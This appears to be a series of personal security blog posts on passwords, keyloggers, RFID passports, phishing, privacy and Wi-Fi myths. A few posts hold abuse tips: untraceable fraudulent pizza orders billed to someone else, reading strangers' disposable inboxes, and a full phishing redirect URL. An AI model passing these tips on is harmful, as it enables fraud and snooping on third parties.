Bringing down the house.

There have been so many action movies where the use of access tokens is demonstrated. They really are small devices which usually provide a long string of numbers, which periodically changes and only the device owner knows about it. Therefore it must be the ultimate form of secure authentication. Right?

Well, it's not a bad idea to start with. The problem is that humans are always involved in the process. Like an IT Security director who suggested users should attach their personal access token on the computer they are using to prevent them from misplacing it. OMG. It's like using a sticker with your username and password on top of the screen, version 2.0.

As you can understand the system itself may be sufficiently secure but the way it is deployed and used may severely counteract its benefits.


P.S.: And of course there have been and always will be stupid people :P

Putting emotions aside.

Today I was talking to a friend of mine about a project I'm working on and the PKI in general. We analyzed the current issues concerning end-user security, whether it's an ATM PIN or a website's login. We agreed that the common one-factor (password) authentication is just about to expire. The world needs something better and by this I don't mean "stronger" passwords because this usually increases the complexity of the token one has to remember, therefore compromising the safety of the system. So we were sitting there, drinking coffee, talking about it and suddenly my friend said:

When it comes to security, emotion must get out of the way.

By that he meant that we should eliminate the human factor. The actual words he used were so interesting that I thought they were worth mentioning here. He spontaneously revealed the reason humans are the always the weakest link in a security chain. It's not because they can't count high enough or work 24/7. It's because they have emotions that can drive them out of logic's way and make them do things they will later regret.

Those emotions will make them "help out" a beautiful girl, sympathize for someone pretending to be their colleague or express unreasonable behavior under fear or stress.

By eliminating the human factor we eliminate fraud (OK, maybe that's not entirely true). Computer's never doubt. Their decision making mechanism is binary, something is one or zero, true or false.

Of course computers are products of humans so there you have it again, the human factor. So maybe it's not that easy to get rid of it but surely can contain it in groups of specialized people.

It's one thing having a security expert taking care of your safety and quite another You being solely responsible for it.

So the next time you read a security policy for a service, search for the You-Are-Responsible-For-The-Safety-Of-Your-Account paragraph. Don't accept it and look for something more serious.

Passwords in the hands of users.

I've talked a couple of times about passwords, how strong they should be, how to strengthen them for that matter, etc. But when it comes to the average user what does he use as a password and how does he understand the whole concept?

There's an interesting article by Bruce Schneier on his weblog. The moment I saw it I had a deja vu. At first I quickly searched through this blog to see if I've already talked about it but no. So I guess it's because this is a constant issue that's been around for years.

The article is based on a research done by some guys who set up a fake MySpace login site and harvested actual user passwords. Then they ran a couple of tests on them and presented the results.

So 23% and 25% of them where 7 and 8 characters long which is good, meaning that people have realized that just because your password is secret to everyone else doesn't mean it has to be three letters long since the attacker can always start guessing.

Also, an impressive 81% are using both letters and numbers although 28% of them are just lowercase letters followed by a single digit. That might have been sufficient enough if over 90% of them weren't dictionary words or names followed by a number like "book2", "label7", etc.

Finally, the most common password was "password1" which is relatively good considering that a few years back it was just "password". So things are slowly getting better :)

At this point I feel obligated to rise a question: do we need stronger passwords or just an alternative to all of this?

Think about it. I'll get back on this...

Should Viruses Threaten Us?

The last time I, and anyone I know, was infected by a computer virus it was almost 10 years ago when 1,44MB (3,5'') diskettes where in fashion. Back then, viruses where a true menace since the Internet was not popular enough and the most common file exchange method where these diskettes. At the same time Anti-virus programs had not yet proven their necessity and as a result, a single diskette (used as a means of file transfer) could infect many many computers.

Users trusted a diskette from a person simply because they trusted the person. That was totally wrong since they couldn't really know where it had been before. And without an Anti-virus or any experience on the matter they could, without knowing, use an infected computer and possibly infect others simply by sharing their files with them. It really was like the human HIV virus. The was a big problem.

Since then, many things have changed. For starters, most computers don't have 3,5'' drives any more! Of course there's the Internet which is an even worse potential point of infection since you are practically exchanging files with the entire planet but one would expect computers users had grown wiser.

In our modern world where computers come with pre-installed Anti-virus systems is it acceptable for the average user to be infected or, worse, to infect others?

Today a friend of mine was telling me how his PC got infected by an .mp3 file someone gave him. What it did was create a hidden folder every time that file was played and fill that folder with random data over and over until it took up all the space left in his hard disk. He had to format the disk and install everything from scratch to fix it. He also mentioned another case where a virus cloned itself at runtime and consumed all the CPU time, thous making the system freeze. Rebooting didn't help him since it loaded itself during boot. He had to format the disk again.

While he was talking to me I couldn't help thinking "is this right? is this supposed to happen?". I mean, for a moment I thought I was 10 years in the past exchanging diskettes. I really couldn't believe that a computer user in the year 2006 did not have an Anti-Virus system installed and, worse, that a large computer users group did not shield themselves against such old and common threats.

From what I understood he didn't care much about the incident and, in his mind, thought of this as a totally normal thing because "computers break" and you have to "format them quite often to keep them in shape". Is he mad?! First of all, formatting your master hard drive should be the absolutely last choice you have and, frankly, I can't really think of a problem that demands this kind of solution. Secondly, I can't get over this belief that computers are "mysterious machines that may refuse to start or work properly for no reason". I believe we had almost two decades to familiarize with them so if you feel funny around computers maybe you are falling behind. Try to keep up!

In my little Utopian mind I picture a world where no viruses are left lying around just because everyone is keeping them out of their PC.

Sadly viruses are out there and are more mean and destructive as ever and we've simply forgotten about them. We feel safe when we shouldn't. We may not hear about them or see them before us simply because they are in hibernation. The first chance they get though, we'll know they are there the nasty way.

To sum up, unfortunately we haven't gotten rid of viruses so it's better to keep an eye for them since all it takes is a low-tech piece of code that will get you in trouble when you least expect it. Things can change and will change as soon as we treat our computers with responsibility and understanding.


P.S.: This page has been scanned for known viruses and found clean :)

Why Passwords are a Bad Idea...

BBC News has an interesting article on how passwords may weaken our security by far.

It goes on saying that, according to the UK's International Telecommunications Union, people nowadays have so many passwords to remember for so many different places that they inevitably start re-using the same keys again and again (in the worst case of all, the same password is applied to all authorization queries). As a result, it is quite easy to compromise a man's electronic identity (his online accounts to forums, commercial and banking services, e-mail, etc) just by cracking one or two of his codes (which may also be easy to guess - don't forget about brute forcing and common words). And of course many variant schemes may be seen here. For example if an e-mail account is compromised and the attacker uses the "remind my password" feature to all web sites the user is subscribed in, there's a great portion of them that will return the actual code is clear text via e-mail.

So there you have it, passwords are making people's life hard and at the same time increasing their sense of insecurity. They can't remember all of them! So they start writing them down on a piece of paper which they keep inside their wallet. Or they use (common passwords) their birthday or license plates' number and in general they violate one-by-one all keeping-passwords-safe rules.

And I'm wondering, is it time to move forward to something else? And if yes, what might that be?

Let's consider PKI for a moment. It stands for Public Key Infrastructure. I won't get into too many details here (maybe another time). Just thing of this as a system where all you need is a smart card (looks like a credit card) which holds all your information (identification, license, commercial and banking accounts, private keys). This card is password-protected so you do have to remember one password. Maybe there'll be a next version where there is no password and a biometric sensor protects the card's contents.

Anyway, with a single smart card you can exchange, through secure software, all the necessary authentication info with your e-mail provider (to access your messages), your bank (to check and manage your balance), e-commerce sites (shop online and all) and of course any other place on the WWW in which you need to properly identify yourself in order to gain access.

While some may think of this as a bad idea because all your keys are in one place, a single card - aka single point of failure, which is easy to be stolen and / or compromised. Well that's not exactly true. The card itself is very secure. Yes, someone may steal it from you since it is a physical item but it is highly unlikely he will ever be able to access its contents. So your secrets are safe and your life a lot easier.

After all, strengthening security should never be towards the end-user.

This will make things difficult for him and cause him to compromise his own identity. The PKI concept really means for the end-user to have a single card in his pocket which he must use upon login and take away upon logout. As simple as that and everybody is happy :)

This is a big issue and I'll get back on this sometime soon.

Bottomline, forget about passwords!

Programmers please do meet Designers

As an open source programmer I try to make my code very flexible and customizable. This means that my code may be read by someone else and take extra modules or be applied in various environments and still behave in an optimal way. This is achieved through a variety of options and parameters passed at run time by the end user. Sounds cool, right?

Well, this demands a configuration file, in the worst case, as long as the number of options the code parses. Of course all is set to default and the end user may never notice but what happens when we go GUI?

A Graphical User Interface is connected to a "user-friendly" way of controlling a program or a computer in general. The problem starts with the way people understand this. For me, user-friendly is when I am given a list of options (well documented of course) which shape the program according to my wish. For someone else, user-friendly is a program which contains only one button "Run" and NO options. The user clicks "Run" and it runs, no questions asked. The user will never understand what is going on. The program may not work properly or may not work at all. The user doesn't know. As long as nice balloon messages pop up, everything is smooth.

So... it is very important to take the burden of GUI from programmers and establish communication channels with designers. Otherwise you'll get something like this:

Combating Keyloggers

Ever found your self in an Internet Cafe checking your e-mail or a forum you are registered in? Did you stop for a moment to assess your security? Is someone looking over your shoulder? Is someone watching you in any way? Is the computer you are logged in infected with programs recording every keystroke? (You can't really check that one) No? Well, you should!

Ideally your presence in a public Internet access place should be entirely transparent. This means you should not type in at any time any personal information (no form filling, no logging in).

Anyway, I've come across a very interesting paper (PDF) which describes a simple yet effective technique in entering secure credentials in a compromised computer. It all begins with the basic principle in security: always assume someone is listening. So let's say you are sitting in a public computer. Always assume there's a keylogger installed which records every keystroke therefore is able to record your username and password as you type them.

For every valid username or password character you type, click somewhere outside the form and hit a long string of random characters. Then go back inside the form and continue with the second character, etc. That way while you'll have entered "ABC" as you password, the malicious software will have recorded "AasdsalklkblB9rbvmdsaCdg9tmbafff" (capital letters are used to distinguish the actual token).

This works because the keylogger may know that you are inside an internet Browser and what keys you press but cannot figure out the exact location of the keyboard cursor.

Sounds like a good trick huh? Well, I agree. It is pretty good. But let's be smart about using it.


[ Debugging... ]

Improper use of any security technique is all it takes to render it useless.

In the above method you should not type the same password twice in the same computer because, as you can understand, patterns emerge. So if I type:

AasdsalklkblB9rbvmdsaCdg9tmbafff
AlkfdlgmkmbkdasB324kfdlklCkfkbba
dmfdlkdsAmmkdgfg552BdfdffdCcba

we have three strings of characters all containing, for sure, the actual password.

Now all we have to do is use a known algorithm which uses certain known characteristics to crack the system. For starters if a certain letter or number or symbol is not present in all three tokens, it is excluded since it can't be part of the password (which exists in all three). Next, there's the sequence of characters. If for example we encounter the sequence "mb" (and not the sequence "bm") in only one or two of the tokens then either "m" or "b" have to excluded. The algorithm goes on so that only a few characters are left and then we start with possible combinations. If we take into account that most users use 5-8 character-long passwords, a brute force won't be too hard.

Of course there's always the smart way called Longest Common Subsequence problem.


Let's sum up...

what we have here is a very practical technique in protecting our sensitive information from a keylogger. But we must use it wisely and only once since patterns emerge which can bring the whole thing down.

P.S.: Also please consider the majority of users, when asked to type in a random string, will go for "asdf..." due to their fingers' position on the keyboard. Not so random :P
So here you have another characteristic which can make the cracker's life a lot easier.

RFID Passports Cracked

It seems that the new uber-secure RFID Passports issued by many European countries after pressure from the U.S. are not that secure after all.

RFID Passports are ordinary-looking passports containing, besides the "human readable" information and authenticity signs, a Radio-Frequency Identification Chip which stores all printed information (and more) and transmits them to wireless readers used at Border Control. The reason for the chip's existence is that it is considered (or at least was) impossible to copy or forge so that even if a malicious person managed to reproduce the actual document he would never make it in producing a valid chip to complete the passport.

So one could ask "what if I buy an RF Reader for $9.99?". Well, authorities are using the 3DES encryption algorithm to encrypt the information on the chip. It is currently considered an above average method, providing 112 bit effective security.

The problem starts with the (known) fact that three public pieces of information are used to build the encryption key: (in the exact order) the passport's serial number + the owner's birth date + the passport's expiry date. So... you don't have to attack the encryption! Just find out (pretty easily) that kind of information and you have yourself the actual encryption/decryption key. Then you can go home, in your garage and clone or modify the chip's contents.

This is very much disturbing since the whole purpose for the new passports was the security provided by that chip but it turns out there are a few wide cracks in it.

[...]

Another problem with these passports is that they transmit in the air and that they are (normally) unique. So... one could identify you by placing an RF Reader inside a dumpster that you walk by every day. And maybe place a bomb inside that would go off if you and only you be in proximity.

Of course, official authorities have issued passports sleeves that act as "RF shields". According to this the chip cannot be read from inside that sleeve and you only take it out just before the police checkpoint. Well, it has been demonstrated that even then, the chip can be read. You just have to be really close to the subject. Doesn't seem like a problem when you are packed up against each other in a crowded area like the subway or a huge waiting line in the airport.


To sum up, current government efforts to control foreigners in their countries seem like panicked maneuvers of a nation under attack. If they feel that way, then somebody should admit it and then maybe we can all go home at toss those e-passports away (maybe shred them and burn them just to be safe).

And for the last time, just leave cryptographers to deal with cryptography issues!

Committee members are excellent at screwing it all up.

Goodnight.

"For your convenience"

It is a common joke here in Greece the story about a boyscout who desperately wants to do his good deed for the day and helps an old woman cross the street although she preferred to stay on the other side. The last few years many services online tend to do things for us, before us.

For example, today I received a World of Warcraft 10-day free pass from a friend of mine. According to the instructions all I had to do was install the game and create an account using the key written on the pass to play for free on the WoW servers. Right? Wrong! During the account creation process Blizzard asked me for my credit card number. Why? So that should I wish to continue my "online experience" I won't have to go through a new registration process and possibly don't make it in time to keep my current character in the game. In fact the disclaimer insists that this is for my own "convenience" and that if I make that choice (to renew my subscription), my credit card will be automatically billed every time my pre-paid time expired to ensure "undisrupted gameplay". The above are an essential step in the "free" account registration process. If I want to get a free account, I have to fill in my credit card number. I may stop playing at the end of the 10-day free period and never get a new subscription ever again. It doesn't matter for them. They still need my credit card information. Of course I do not believe this is a scam and that I'll be billed but what a minute.

The problem is that Blizzard will store and manage my sensitive credit card details according to its policy. Well, I do NOT trust that policy. Having that information available in some hard disk somewhere in the world does NOT make feel safe. And what if some cracker manages to compromise the safety of their systems? Certainly no one can claim they have a "hack-proof" system. You never know the next point of penetration until you are penetrated in that way. So why do I have to worry about that?

Giving your credit card for an one-time automated billing process is one thing and keeping it stored for the future is quite another. The people who use the second policy have to say in their defence that the user does not have to go through the information fill-in process again and again. I don't mind. As long as we are talking about SSL sessions I really don't mind typing in a few letters and numbers every time I want to buy something.

So this is a classic case where they make me give up my information for them to store in order to make a single purchase. I may never get anything from them in the future. That doesn't matter. For my "convenience" and "service" they'll keep that information. Well, if they care so much about my "convenience" why don't they take the time to ask me what I really want?

How safe do you feel about your online accounts? Right now, this moment, assume your identity is compromised. What would you lose? Do you have your credit card details stored somewhere? Assume they are compromised. How much money do you have in your bank account? Think about it.

These things scare people off the net. It's not me or any other guy talking about security and possible attacks. It's the marketing departments of companies providing "digital ease" and then when someone hacks in one of these databases and it hits the newspapers everyone is terrified and talking about how vulnerable we are against these "criminals".

Let's go back to the Blizzard case. I did not give my credit card. For a moment I considered opening another bank account and having a second credit card, linked to that account, so that I can contain a possible disaster (I would keep a very limited amount of money there etc). Then again why should I do it? Why should I get into paperwork and banks and ultimately employ a very "inconvenient" way in order to register in a system designed for my "convenience"? And what if I do not have a credit card? World of Warcraft subscriptions may be payed with the use of pre-paid cards sold in stores. Many people, especially teenagers, use them. So there's an alternative payment method for full-time subscriptions but not for guests.

To sum up, the "free guest pass", designed to bring people in the game, worked exactly the opposite way for me. And any other "smart" system that works for my "own good" without asking me what I really want will never have me as a customer.


Dear Blizzard,

I am not technophobic or anything. In fact the majority of my purchases are placed online. I am into technology and that's why I want to see things getting more secure and therefore more user-friendly. I JUST DO NOT TRUST YOU GUYS.

Reorder accounts in Thunderbird

Ever wanted to change the order in which Thunderbird presented your e-mail accounts in the left panel? Me too. Unfortunately it is not that easy for a novice user.

First of all, I tried to think like the people who wrote it. We' re talking about serious developers here. So it is common to allow a lot of configuration/customization to be done through special files (known as "conf" files). These files contain text which is interpreted by the application at runtime and are an excellent way to pass many arguments. This provides much more options that the typical "Options" button under the Tools menu.

So I started looking around my Thunderbird Profile folder until I found "prefs.js". I opened it using a serious text editor like Notepad++ to find the entry:

user_pref("mail.accountmanager.accounts", "account1,account2,account3");

I experimented by swapping "account1" with "account3" and restarted Thunderbird. And guess what, it worked!

Excellent Tip if you ask me :)

Oh, make sure you are not running Thunderbird while modifying this file and, just to be safe, take a backup before doing anything.

P.S.: You Profile folder should be located under "C:\Documents and Settings\[username]\Application Data\Thunderbird\Profiles\"

One click away from doom

Recently I caught my self observing various high-level graphical interfaces used in web services. All of them were custom-made solutions made by small companies yet used by large organizations and universities. In most cases they try to save some money. That's quite a big mistake since large-scale commercial applications have been tested and are supported by entire groups of programmers. On the other hand, something your local two-man dev team will present will be buggy and incomplete and the drill always has to do with the programmers standing by the client and fixing stuff on the fly. In the end, the result will be something that "just works".
How about quality of service?

I would like to go pass the bugs and focus on usability. Many times two buttons are placed next to each other: one commonly used and a very "dangerous" one like "delete" or "submit". I mean it is a matter of time before some user "misses" and clicks the wrong button. Why? Because someone tried to get the "cheap" solution and look good to his boss.

To a certain extend I understand the guy who made it. I am a programmer myself and don't pay much attention to design (and GUIs in general). On the other hand, I would never choose my self to develop from scratch something big and important because I know I would make mistakes that have already been done and would ignore certain things that have already been pointed out. Nobody can know everything. One must be wise enough to make that call while discarding any influence coming from his ego.

I am thinking about the guy who decided to hire a local crew to do the job. Obviously he doesn't understand much about the job to be done. Probably he is some financial analyst with no idea about computers or software. I bet he has never written a single line of code. Because if he had, he would know that all he did was undermine the entire group of people that would have to use the system. He has one chance to bring in a service and he made the wrong choice. It'll be another 10 years before the system is revised and even then it is doubtful whether they will replace it or not.

In the end of the day, it is these things that make the life of computer users harder and therefore enhance the myth that "these damn PCs are a pain in the neck. We would be better off without them".

Think Big, Program Less

Today I was programming an indexing application in Java. It starts from a specified path and creates a Hash table with all files in that path and all folders underneath. Its purpose is to find duplicate files even if their filename is different. The code is pretty simple but I made one critical mistake: I didn't stop and think how my procedures would behave in a large scale. That cost me about an hour of debugging (more like my head banging against the wall).

Here is the problem: Although the code is correct, it recursively does it all in a single method. This means the Garbage Collector, Java's memory freeing mechanism, won't do anything until this entity is no longer in use. As a result no memory is being freed during the application's operation. This is very hard to notice when using small files as a test bench but what happens when you have to index a couple of dozen of gigabytes? I'll tell you what happens: withing the first seconds of runtime, the application consumes all available memory and the Virtual Machine crashes. If you feed (the beast) with more memory it will simply grow bigger before crashing but will never finish. Only if you could provide virtual memory equal to the total size of the files to index, the application would complete its job but that's impossible and of course a very very very very very very bad idea!

The solution: design a new method explicitly for hashing the files, one at a time. So for every file, you invoke that method, load its contents in memory, digest them, unload the method, release its contents (for the appetite of the Garbage Collector) and return the result. So simple! And again let me stress out that the unsuspected developer would consider the two approaches as equal.

I was pretty sure my application would work the first time and was about to release it through my web site when, just for the fun of it, decided to check out if I had any duplicate MP3s. Out of pure luck I discovered that my code would behave very badly (or if you like, would not behave at all) under real-life conditions.

What I've learned from this is to think out of the box (at least try) and try different angles when designing something. My point of view may be entirely different that yours and I have to take all factors into account if I expect my programs to function properly in systems besides my own :)
Oh, there's another useful point that comes out here: you may be using a high-level language but you must never forget your computer's architecture and capabilities. In this case, don't forget about memory management just because Garbage Collector does it for you.

P.S.: This reminded me of a major bug caused by the overflow of a common “int i” temporary variable in an “average number calculation” implementation. I remember pointing out that certain programming “habits” should be revised to avoid (at best) the embarrassment. You can find the story here.

Tactile Passwords could strengthen our security

There's an interesting article over at NewsScientistTech on "Tactile Passwords", a user need-to-know authentication method that relies in the sense of touch. This means that one doesn't have to type in or pronounce a string of characters or numbers, just remember a tactile pattern (or sequence of patterns) and select it upon challenge by a security system.

In detail, Braille-like devices (already employed by visually impaired people) are used to carry patterns to the user's fingertips. Then, the user must click (or somehow select) the ones corresponding to the unique sequence he was given by the Certificate Authority. It's like the machine is asking you "Is ABC your password?" and if it is, you answer "Yes". This may seem stupid at first sight but think about it.

No sensitive information is exposed on a screen or keypad but tiny pins under your fingertips, which only you (the person in contact) may feel and "read", perform the authentication process. Of course the sequence of patterns is randomized each time but that's a detail.

I believe this is a very interesting idea when it comes to safeguarding a critical point in user authentication: the one-factor (aka password) policy. Every time you type in your ATM PIN code or any other code for that matter you shield (or should do so) the keypad with your hand. Why? Because anyone standing behind you could see what you are typing. This is the same reason asterisks, instead of the actual password, appear on the screen. "Shoulder-Surfing" is a big headache to security experts. Could this be the end of it?

Of course I, being a little more paranoid, believe that any place where some stranger may stand behind you while typing a PIN code is not a safe place. He can always stick a weapon in your back and force you to type the correct code. As you can see, if you have to worry about someone observing your actions, you have to worry about even more serious things. Anyway, just giving some food for thought.

P.S.: If you can't picture the tactile authentication devices, check this out. It looks like a common mouse, doesn't it? :)

Who's messing with my mail?

Everyday I see mailing lists that allow uncontrolled (un)subscription. That means that all you have to do is type in your e-mail address to join/leave that list. Why is that wrong?

Because if you know a guy's address you may subscribe him to spam/porn/etc lists despite his will. You don't get much profit out of this except the fact that you make his life a little bit harder (sorting out the spam). For example I beginning to believe that someone is giving away the list address of an academic class I am attending (the teacher is a pain the neck and many of his students would like to get back at him). Also, if you know that someone is subscribed to a usefull (to him) list, you may unsubscribe him at any time, preventing him from receiving future updates and news.

It's like someone can subscribe you or rivert/cancel your subscription to a magazine or, worse, divert you bills so that you never receive them and therefore never pay them. As you can see, it IS a big deal!

All mailing lists should provide a verification link/code every time you try to add/modify/remove an entry to their system.

dodgeit.com: Beat 'em in their own game

Having an e-mail account is common these days. In fact, most people have more than one. So, there is a tendency among web sites to ask for your e-mail in order to track you down somehow or keep statistics of their own. For example, wanna download sth? give us your e-mail! This doesn't seem so bad at first but wait a minute! Giving away your address lets them know where they can reach you. And unfortunately a great deal of them takes advantage of that. For starters they decide to subscribe you to their mailing list, sending your their daily or weekly newsletter. Others sell your address to marketing firms which in turn use it to promote their customers' products.

In the end you end up with a dozen or so e-mails a day in your Inbox that you don't care and never asked for. What can you do?


Well, there yet another solution to this: dodgeit.com

Next time you are asked for your e-mail, give a random blabla37@dodgeit.com. No registration required! After that, visit dodgeit.com and check your e-mail (still without any registration or password). Pretty cool, huh?

Another interesting aspect of this: can you think of common usernames other people would use? Like nobody@dodgeit.com or person@dodgeit.com, etc? Try entering some of them in the site and you'll get a list of the e-mails these people got. So next time you register to a forum or sth, use a hotmail/gmail/yahoo account instead!

Dominos GR: Anonymous Pranks Inside!

It is a common prank to order pizza for someone else by forging their id. All you have to do is give the other guy's name and address and only imagine his surprise when he opens the door to find the delivery guy holding 5 extra-large pizzas. Of course pizzerias use caller-id to avoid taking orders from third-party numbers. So far so good.

But here comes the Internet to spice things up! The greek branch of Dominos, located at dominos.gr, let's you place online orders using a pretty lame authentication system. All the users have to enter, is their phone number and street number (just the number not the street name). The first time you order, you have to do it by the phone so that you provide all your details. The second time though, by entering your phone number in the website form, they pull your record and carry out the order. In fact the online accounts use the same database as the dial-in customers.

Do you see the problem here?

If I know a guy who orders from dominos (he doesn't even have to order online) I can easily lookup his phone number (courtesy of the national, public phone records) and his address. So I can bill him with a dozen or so pizzas. The advantage against the original phone prank is that in this case I cannot be traced! Whether I am using a dynamic ISP IP (the records are classified and no warrant will ever be granted for that purpose), a public hot-spot or Internet cafe or even Tor, I pretty much stay under the radar.

I don't get these guys. The information they need to log you in is public domain! Anyone, anywhere, at any time may access it, copy it and use it freely. How about that? LOL!

Yahoo Redirection Hole Exploited by Phishers

Every day I get quite a few spam e-mails. Normally I just delete them but today I'm in an investingating mood :)

So, I got this message titled "eBay Member" from "aw-confirm@eBay.com". First of all, I took a look at the header to find out it had been sent through a german gateway. Why would the famous online auction site stationed in the U.S. use such a server? It wouldn't!

And of course there was a link (hidden under HTML) pointing to

http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP=1148028186/**http%3a//3281702322/https://signin.ebay.com/showgifUsingSSL862984con462msgMNSIEhufem37ajhd84Sllencrypt370/ws/eBayISAPI.dllSignIn.php??https://ebay.com

If you visit that pretty long and suspicious link you get a web site just like the eBay.com login page only the SSL icon is missing. And this is because only the original site is in possession of the certificate.

Anyway. Last month I talked about a google redirection hole but then again almost all search engines suffer from similar exploits. Yahoo is one of them. The question is what can we do to fill these holes while preserving the freedom of information and user-friendliness of the service.

Finally, one thing that keeps us somehow safe from phishers is that everybody speaks greek and all these e-mails are in english so in the majority of cases you have no business with a foreign service and disregard it. I could only imagine what would happen if they were written in our native language.

Leaking your info on the net...

It's been 8 years since I purchased Windows 98. At that time I felt really good about my self buying an "advanced Operating System". Of course later I realised I had payed for something that didn't work well most of the time. Anyway, I was living the dream. I was the proud of owner of Windows so I had no second thoughts entering my personal information during the Installation.

Not long after that I found out in horror that web pages could read that information and store/forward them. How did they get that? Well, I started finding cookies in my hard disk titled "firstname.lastname@domain". That's right. It was courtesy of Microsoft :/

Every time someone asked for my details, Windows kindly provided them! At no time did I receive such notification or warning. My name, address, phone number etc where transmitted transparenty to the web.

I remember immediately formatting my hard disk (which does not wipe out sensitive data but at least renders them inaccessible to Windows) and installing the OS under a fake name. I, the legal owner of an overpriced OS, had to forge my identity to ensure some, partial anonymity.

Since then, I developed a fear against entering my name anywhere. Privacy statements go right out the window for me. Whether it is a well-known web site (companies, service providers) or a no-name one, it's one and the same. I simply do NOT trust them. I am not ashamed to state so. I am not fealing paranoid. I just feal you are NOT good enough to protect my privacy. Goodbye now.

How friendly are "User-Friendly" applications?

Not too many years ago, computer software was just green text on a blank screen with a bleeping cursor. As soon as PCs became popular the term "user-friendly" was born and carried out by the marketing departments of software vendors. What they were trying to do is make a computer and its software more appealing to the average person: colors, icons, tooltips and helpboxes were deployed. In the same spirit, they enforced to the companies' development department an abstraction policy which kept "technical stuff" hidden so that the software users were not confused.

So far everything seems ok and the intension itself is pretty right (make PCs accessible to everyone) but something went wrong on the way. Software that keeps its technical part hidden should operate perfectly (aka bug-free) at the same time. Otherwise when you face trouble, you can't trace it back to its source and fix it/find more about it.


Today's example is Windows Live Messenger but this goes for all software that tend to be "user-friendly". I had this problem: if I chose for the program to remember my password, I was logged in but my contact list was not updated correctly. All my contacts were located under "Other Contacts" and my custom-made categories remained emtpy. I checked with my Hotmail account to make sure that my address book was in order but for some reason the Messenger could not synchronize. Then I tried removing the "remember-me" option so I had to type-in my password every time and, guess what, the synchronization was done perfectly! I mean... omg!

This behavior would stumble the average user who would just say "Windows Sucks". On the other hand, I quickly suspected that in the first case, some local caching was done (save my password, maybe some profile info and stuff) while in the second, all information was downloaded from the server. Yet I had no way of fixing this (clear the cache). At least not from within the Messenger. How friendly is that?

The programmers, in an attempt to keep me away from "technical stuff", have hidden (in fact scattered) all program files. As far as I can tell there's "Program Files", "Documents and Settings\MyUsername\Application Data" and "Documents and Settings\MyUsername\Local Settings\Application Data". Of course these folders are marked hidden so, in normal circumstances, they are invisible to you.

I had to use Tools > Folder Options to View All Hidden Files and Folders, then search my way through Application Data and find a folder titled "Windows Live Contacts". Still I wasn't sure it was the solution to my problem. Anyway, I deleted it and restarted Messenger. WoW! It seemed I'd hit jackpot! The synchronization was done therefore I had just deleted the problematic cached files. Does anything from the above seem "user-friendly" to you?


To sum up, hidding debug options and program structure from the user means you are absolutely sure about your software's well-behavior. Otherwise at least give us a chance in fixing your stupid mistakes ourselves!

Danger! DOT GR XSS Detected!

It has come to my attention that a major website, here in Greece, is vulnerable against XSS attacks. I would expect something better from these guys. That site, which I do not intend to reveal for obvious reasons, is actively present in the IT market and one would think it employeed trained professionals. Yet, right there in the front page a huge exploit relies. I haven't done any serious digging but I expect to find more oversights.

As I've written before, XSS (aka Cross Site Scripting) is happening right now while not only programmers but security experts haven't even heard of it. Eventually they'll get to know it the hard way I guess.

Gimme the address & keys to your house!

Today I received an e-mail from a friend of mine asking me to take a poll about her self ("Do you think I'm smart or do you think I'm sweet?" - Like there's no way she can be both). Anyway, I did answer (don't ask) by following a link to the poll-hosting website. After that, I thought it would be a good idea to set up a similar poll about me and send it to a few people.

It was then that the website asked me to enter my hotmail login and password!!!

The idea was good I guess: they wanted access to my hotmail address book so that the poll I had just created would be forwarded to all of my contacts! Let's say for a moment that spamming my entire address book is ok.

But asking me for my password? What assurances do I get that they will not keep it in some database? I mean giving away my password is a pretty stupid thing to do. The official hotmail services will NEVER ask for it. It may seem convenient to automatically get the e-mail addresses but at what cost?

Anyway, let's say that I am not the least bit suspicious about this and believe they will not store or use my password against my will. Here comes insanity number 2!

The session was not encrypted! No SSL! No nothing! Do you know what that means? The password is transmitted to the server in plain text! That's right, your hotmail password (along with the username) is transmitted from your PC, over a dozen Internet hops and to the server. Anyone may read it in any step of the way with absolutely no effort.

So let's recap: A noname website, in order to conduct a survey among your contacts, asks for your hotmail username and password. That password grants it full access to your messages, contacts and configuration - not just to the address book. Also, that password is transmitted in plain text on its way to their server so any malicious user can read it.

To provide solid proof for this I conducted a little experiment. For the purposes of this, my e-mail will be "testing4this4out" and my password "mypassword". I filled that info in while having a packet sniffer running in the background. The result? As soon as I clicked the submit button I got the following screen in the sniffer...

(If it's too small for you to read, click on it and you'll get the larger version)
As you can see, my e-mail and password appear before you. If this was real life, I would be totally compromised. End of Story.

To conclude, I find it preposterous being asked for my password by a third-party. Moreover when that party does nothing to protect such sensitive information. It seems that we have to look out for ourselves and be constantly on our toes to avoid, the least, an unpleasant situation.

Wireless Security Revised

There have been talks and talks about Wireless Security but what does the average user know and, more importantly, what does he apply?

Last night I logged in a popular technology forum. It's one of those places where users talks with users and help each other.

A while ago there was a talk (in another forum) I participated in which examined whether forums are the new generation of information or just Unreliable Gossip 2.0. From one point of view, forums allow and promote freedom of speech. Anyone from anywhere may say what he/she has to say. No borders, no boundaries and no censorship. On the other hand, that uncontrollable model of information is susceptible to the "psychology of the group". This means that rumors can easily spread, facts can be twisted and ultimately have dozens or hunders or thousands of people misinformed (I might say deceived) just because "everybody else thinks so". That's the problem right there.

When it comes to critical user-to-user advice, how sure can one be he's getting the right info?

Now, let's get back to the popular technology forum and yet another Thread on Wireless Security. A lot of people in there consider WEP secure, some suggest disabling DHCP and applying a hidden SSID setting and the majority considers MAC Filtering as an effective action. Of course the above will only keep out of a Wi-Fi Network users with the same intellectual level as the ones proposing them. Then again such users don't attack other networks. If they are lucky, when they turn on the computer, it will automatically associate to a network and get an IP through DHCP. Determined attackers on the other hand may penetrate these protective measures in no time.

That's why I consider these tips more dangerous and harmful than any malicious hacker.

The reason is they provide a false blanket of security. Most of these people think "if user1 and user2 suggest them, it's ok". Then, these people, when asked by others to contribute, will replay the same false information as if it was their own, completing an endless loop. Finally a more literate user mentioned WPA/WPA2. That's pretty good unless you use a common dictionary word or name as your Pre-Shared Key.

To sum up, it has been my intention to illustrate the present situation among "user communities" on (wireless) security issues. I would never trust (or at least accept "as-it-is") information from Bob235 or PurpleBeast (the names are fictional), why would you?

Detecting Tor

Talking about Tor with RSnake has produced some interesting points:

First of all, the use of Tor can be detected. In detail, Privoxy - a proxy working with Tor to provide web surfing anonymity - tends to block certain website elements that may blow a user's "cover". Such behavior can be monitored by a website to determine whether a visitor is under a cloak of invisibility or not.

Also, as pointed out, Tor network uses the domain extension .onion (like .com). Of course that is inaccessible outside the network so there you have it, another detection way. If such page gets a hit, the user is using Tor. Of course the user's anonymity is not compromised in any way since one can never be sure about the given IP. Yet this method is a potential tool for content providers who aim in restricting access to identifiable users.

Tor still remains one of the best ways of operating in insecure networks.

